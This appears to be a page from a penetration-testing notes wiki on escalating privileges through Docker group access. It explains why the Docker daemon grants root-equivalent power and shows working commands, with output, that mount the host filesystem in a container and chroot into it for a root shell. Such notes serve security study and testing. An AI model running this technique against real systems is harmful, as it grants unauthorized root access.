Docker

The docker binary is the CLI for interacting with the Docker daemon, which manages containers on the host system. It enables operations such as running, building, inspecting, and managing containers and images. If accessible to a non-root user, it often indicates that the user belongs to the docker group, which effectively grants root-equivalent privileges.

This is due to the fact that the Docker daemon runs as root, and containers can be configured to mount the host filesystem, execute binaries with elevated privileges, or escape into the host environment entirely. In offensive security scenarios, access to the docker binary is a high-value target for privilege escalation. It allows spawning containers with mapped volumes, executing custom payloads, or even directly gaining a root shell on the host through intentional container abuse.

x7331@kali:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
^C

x7331@kali:~$ docker image ls
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
postgres            latest              adf2b126dda8        5 years ago         313MB

x7331@kali:~$ docker run -v /:/mnt --rm -it postgres chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root)

PreviousComposer NextDosbox

Last updated 18 days ago

Was this helpful?